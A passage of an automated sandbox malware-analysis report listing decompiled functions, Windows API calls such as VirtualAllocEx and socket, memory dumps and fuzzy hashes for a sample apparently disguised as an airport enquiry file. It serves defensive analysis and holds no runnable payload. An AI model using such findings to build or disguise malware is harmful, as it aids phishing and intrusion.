              • Part of subcall function 00CE18EE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00CD973C,00000034,?,?,00001004,00000000,00000000), ref: 00CE193F
            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00CD9D8E
            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00CD9DDB
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
            • String ID: @
            • API String ID: 4150878124-2766056989
            • Opcode ID: 9a67774a2771860deb14c1dda771d15557b89e5a27aeb94ad6e29a6392443242
            • Instruction ID: e331e8fe8dab76ec4ac02bf12d76c0236977296613fa61ad7609a99a27a224ee
            • Opcode Fuzzy Hash: 9a67774a2771860deb14c1dda771d15557b89e5a27aeb94ad6e29a6392443242
            • Instruction Fuzzy Hash: 19416D76900218AFCF10DFA4CC81BEEBBB8EF09300F144195FA55B7291CA716E95DBA0
            Function 00D07BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
            Download Yara Rule
            APIs
            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00D0F910,00000000,?,?,?,?), ref: 00D07C4E
            • GetWindowLongW.USER32 ref: 00D07C6B
            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00D07C7B
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$Long
            • String ID: SysTreeView32
            • API String ID: 847901565-1698111956
            • Opcode ID: a8aab514ed110f983bf089066e170020c85c9897ffd669f2c12aad1dccf4d896
            • Instruction ID: c3fb081ccabd984c20086bdaf7e62d90350dc30637ce13ea60aa496d40bae148
            • Opcode Fuzzy Hash: a8aab514ed110f983bf089066e170020c85c9897ffd669f2c12aad1dccf4d896
            • Instruction Fuzzy Hash: 5F31AE31A04205ABEB219F34CC45BEA77A9EB45328F284725F879D72E0D731EC519B74
            Function 00D07648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00D076D0
            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00D076E4
            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00D07708
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$Window
            • String ID: SysMonthCal32
            • API String ID: 2326795674-1439706946
            • Opcode ID: 48ab5999b684e7c0dd5a3a6245def7896fd005bb787f14eec3001aad40afe779
            • Instruction ID: caa768e72f1993b2d443fbff4b27c2abe80927ae9224379e6c0842651b63e5f7
            • Opcode Fuzzy Hash: 48ab5999b684e7c0dd5a3a6245def7896fd005bb787f14eec3001aad40afe779
            • Instruction Fuzzy Hash: AF219132504219ABDF21DF54CC46FEA3B69EB48764F150214FE19AB1D0DAB1B8519BA0
            Function 00D06F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00D06FAA
            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00D06FBA
            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00D06FDF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$MoveWindow
            • String ID: Listbox
            • API String ID: 3315199576-2633736733
            • Opcode ID: 4a87193f2892f16561a8e1535790853203997b0523119a638ce17b51ebc07264
            • Instruction ID: ec7a9a59f6e96aee39d804c5132e9ec54fefa1ba95ad843f722d06621460750a
            • Opcode Fuzzy Hash: 4a87193f2892f16561a8e1535790853203997b0523119a638ce17b51ebc07264
            • Instruction Fuzzy Hash: 2121C532610119BFDF118F54DC85FAB3BAAEF89764F158124FA08971D0C671DC6287B0
            Function 00D0797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00D079E1
            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00D079F6
            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00D07A03
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend
            • String ID: msctls_trackbar32
            • API String ID: 3850602802-1010561917
            • Opcode ID: 9191ddfcc3dac9c52e28860b82d2a2b67b80f90c79eb1eb971109d9d12170372
            • Instruction ID: 22ffcf4f381546b7ef3b65787cbd8be82f8610b1dde49395b34f08e5096764a4
            • Opcode Fuzzy Hash: 9191ddfcc3dac9c52e28860b82d2a2b67b80f90c79eb1eb971109d9d12170372
            • Instruction Fuzzy Hash: 7D11E372644208BBEF209F60CC05FEB37A9EF89B64F154519FA49A70D0D272E811DB70
            Function 00C84C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryA.KERNEL32(kernel32.dll,?,00C84C2E), ref: 00C84CA3
            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C84CB5
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: GetNativeSystemInfo$kernel32.dll
            • API String ID: 2574300362-192647395
            • Opcode ID: 84e881304189959cfc9e657f55ef711aed9e0bc0334c6fa2479f9685fee40415
            • Instruction ID: 394f63de7b90743024ac4e2cebbd311a29e4943ab77d0b703d898dd6efda1c09
            • Opcode Fuzzy Hash: 84e881304189959cfc9e657f55ef711aed9e0bc0334c6fa2479f9685fee40415
            • Instruction Fuzzy Hash: 18D01731610723DFD730AF31DA1874676E9AF05795B21883A989AD6A90E6B4D880CB61
            Function 00C84D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryA.KERNEL32(kernel32.dll,?,00C84CE1,?), ref: 00C84DA2
            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C84DB4
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
            • API String ID: 2574300362-1355242751
            • Opcode ID: eca9dfd21a37cdcb1eb10ad2d33bdc81d57193ba5b1971812c5f6b8826fa0936
            • Instruction ID: a64dc727f1d64aa7ddaa5a603f1b6b5034c3e943f2e18bc714e43911de8c8bc0
            • Opcode Fuzzy Hash: eca9dfd21a37cdcb1eb10ad2d33bdc81d57193ba5b1971812c5f6b8826fa0936
            • Instruction Fuzzy Hash: 2CD01771550713DFD734AF31D808B8676E4AF09399B21883AD8DAD6A90E7B0D880CB61
            Function 00C84D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryA.KERNEL32(kernel32.dll,?,00C84D2E,?,00C84F4F,?,00D462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C84D6F
            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C84D81
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
            • API String ID: 2574300362-3689287502
            • Opcode ID: 6fde6cf418c5e0c19f1a92bdacb057f1e6f7a8248c0e1ebd529b1dd874260465
            • Instruction ID: 89ade76376bb76b9c375fb9be81dae36fabf55ef5ae8870901fe136253dfbd76
            • Opcode Fuzzy Hash: 6fde6cf418c5e0c19f1a92bdacb057f1e6f7a8248c0e1ebd529b1dd874260465
            • Instruction Fuzzy Hash: 48D01771510723CFD734AF31D80875676E8BF15356B218C3A989AD6A90E6B0D880CB61
            Function 00D01072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryA.KERNEL32(advapi32.dll,?,00D012C1), ref: 00D01080
            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00D01092
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: RegDeleteKeyExW$advapi32.dll
            • API String ID: 2574300362-4033151799
            • Opcode ID: 87d946809208c5bf78338bde54b5ef961b2ee3a5f7a4c6890acceacb4c3d9272
            • Instruction ID: 301ca91d6b22d88a6f894c249eaa03bfb92566aa4e5f3a72b1acf35a38ce27b9
            • Opcode Fuzzy Hash: 87d946809208c5bf78338bde54b5ef961b2ee3a5f7a4c6890acceacb4c3d9272
            • Instruction Fuzzy Hash: B8D0EC35510712CFD7305F35D81875776E4AF05361B15892AA8CDDA690D7B0C4808661
            Function 00CF93F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00CF9009,?,00D0F910), ref: 00CF9403
            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00CF9415
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: GetModuleHandleExW$kernel32.dll
            • API String ID: 2574300362-199464113
            • Opcode ID: 795c9a70167f84b400b707eb495e86e2625af125feefc0f3ff40a68f9fa28554
            • Instruction ID: 2d5874157085a058192dc32560b1b42b026b6b31fd1ca7d606bf9ee55d63ef9a
            • Opcode Fuzzy Hash: 795c9a70167f84b400b707eb495e86e2625af125feefc0f3ff40a68f9fa28554
            • Instruction Fuzzy Hash: 0DD0C73460031BCFCB318F31C9083027AE4BF14341B22C83AA49AC2A90E6B0C8C0CA62
            Function 00CC1B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: LocalTime__swprintf
            • String ID: %.3d$WIN_XPe
            • API String ID: 2070861257-2409531811
            • Opcode ID: 0f769f5414b8849ff1cbdc653f2ffa5bb6d0c36d4d00e856275dd22d9ac8d080
            • Instruction ID: 16133e8b072d8b9275c89ed6764c6d7692d5c755f19f3097aea5bc13b0576468
            • Opcode Fuzzy Hash: 0f769f5414b8849ff1cbdc653f2ffa5bb6d0c36d4d00e856275dd22d9ac8d080
            • Instruction Fuzzy Hash: 88D0ECA1804118EBCA14AA93D864EB9737CA705301F180596F906D1441F2349F84AF25
            Function 00CD76C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 5941aaca9e7184469c6548a728d79a9943860f0282327452943f368d37e109aa
            • Instruction ID: 572f83c57e4a67e9ab91cac6553a2d83ed59f99d005e5aafcce6ff63210e0d2e
            • Opcode Fuzzy Hash: 5941aaca9e7184469c6548a728d79a9943860f0282327452943f368d37e109aa
            • Instruction Fuzzy Hash: 10C17E75A04216EFCB14CF94C888EAEB7B5FF48710B11869AE915EB351E730DE81DB90
            Function 00CFE33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
            Download Yara Rule
            APIs
            • CharLowerBuffW.USER32(?,?), ref: 00CFE3D2
            • CharLowerBuffW.USER32(?,?), ref: 00CFE415
              • Part of subcall function 00CFDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00CFDAD9
            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00CFE615
            • _memmove.LIBCMT ref: 00CFE628
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: BuffCharLower$AllocVirtual_memmove
            • String ID:
            • API String ID: 3659485706-0
            • Opcode ID: 93d6343174b8cfacc593000767b9fbd6b7004ceafe833c002143487d50529d70
            • Instruction ID: 4410acda66c1d3ed68cc1d754efca11102da196ca6836e7c739f5740a681815b
            • Opcode Fuzzy Hash: 93d6343174b8cfacc593000767b9fbd6b7004ceafe833c002143487d50529d70
            • Instruction Fuzzy Hash: B7C16A716083058FC754DF28C48096ABBE4FF89718F14896EF999DB361D731EA46CB82
            Function 00CF83A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
            Download Yara Rule
            APIs
            • CoInitialize.OLE32(00000000), ref: 00CF83D8
            • CoUninitialize.OLE32 ref: 00CF83E3
              • Part of subcall function 00CDDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00CDDAC5
            • VariantInit.OLEAUT32(?), ref: 00CF83EE
            • VariantClear.OLEAUT32(?), ref: 00CF86BF
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
            • String ID:
            • API String ID: 780911581-0
            • Opcode ID: e0a98e78348aa143afa78a5e92c11e2c1ba7ffeb12016554123be63d594cdff4
            • Instruction ID: db5ebfd291888019eae354b884f025b2a9f3277d43f9df99e124f5bbc49dc976
            • Opcode Fuzzy Hash: e0a98e78348aa143afa78a5e92c11e2c1ba7ffeb12016554123be63d594cdff4
            • Instruction Fuzzy Hash: E3A135752047059FDB50EF15C885B2AB7E4FF88318F188449FA9A9B3A1CB30ED05DB56
            Function 00CD7A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
            Download Yara Rule
            APIs
            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00D12C7C,?), ref: 00CD7C32
            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00D12C7C,?), ref: 00CD7C4A
            • CLSIDFromProgID.OLE32(?,?,00000000,00D0FB80,000000FF,?,00000000,00000800,00000000,?,00D12C7C,?), ref: 00CD7C6F
            • _memcmp.LIBCMT ref: 00CD7C90
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: FromProg$FreeTask_memcmp
            • String ID:
            • API String ID: 314563124-0
            • Opcode ID: 0e28387f41b7449ca286c0359b4417542fd22c86b2b6155f1bfdda65ee918486
            • Instruction ID: d9f9466c21dd879d3c50424f65b85d25da57a55e51b959ae35a8455c0a1679d6
            • Opcode Fuzzy Hash: 0e28387f41b7449ca286c0359b4417542fd22c86b2b6155f1bfdda65ee918486
            • Instruction Fuzzy Hash: C8811C71A00109EFCB04DF94C984EEEB7B9FF89315F204199F516AB250EB71AE46CB60
            Function 00CD6DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Variant$AllocClearCopyInitString
            • String ID:
            • API String ID: 2808897238-0
            • Opcode ID: 5a6ea6c0e112d9f14dca4c396ba77c5e5c4337300bf9c9622775652e08aa5ccd
            • Instruction ID: 0474eac404dd5307cfc94486a9775beca887d7f8f8eddbc67de18a55fd9d8838
            • Opcode Fuzzy Hash: 5a6ea6c0e112d9f14dca4c396ba77c5e5c4337300bf9c9622775652e08aa5ccd
            • Instruction Fuzzy Hash: 4451BA306087019ADB34AF66D895B3EF3E5AF48310F24891FEA56CB7D1EB709840EB55
            Function 00D09A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
            Download Yara Rule
            APIs
            • GetWindowRect.USER32(?,?), ref: 00D09AD2
            • ScreenToClient.USER32(00000002,00000002), ref: 00D09B05
            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00D09B72
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$ClientMoveRectScreen
            • String ID:
            • API String ID: 3880355969-0
            • Opcode ID: c0cdb5ef50bc463e5fdebe90902fe785b3f15b60ee410dc7ccf587fa56bf2c87
            • Instruction ID: de0cb2a8c31c191f750e2012f94af118362ddc9a7cc09ca2e7f8dedb1148ee84
            • Opcode Fuzzy Hash: c0cdb5ef50bc463e5fdebe90902fe785b3f15b60ee410dc7ccf587fa56bf2c87
            • Instruction Fuzzy Hash: FA511D34A00209EFCF20DF68D891AAEBBB5FB55324F148159F8599B2D1D731AD81CB61
            Function 00CF6CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
            Download Yara Rule
            APIs
            • socket.WSOCK32(00000002,00000002,00000011), ref: 00CF6CE4
            • WSAGetLastError.WSOCK32(00000000), ref: 00CF6CF4
              • Part of subcall function 00C89997: __itow.LIBCMT ref: 00C899C2
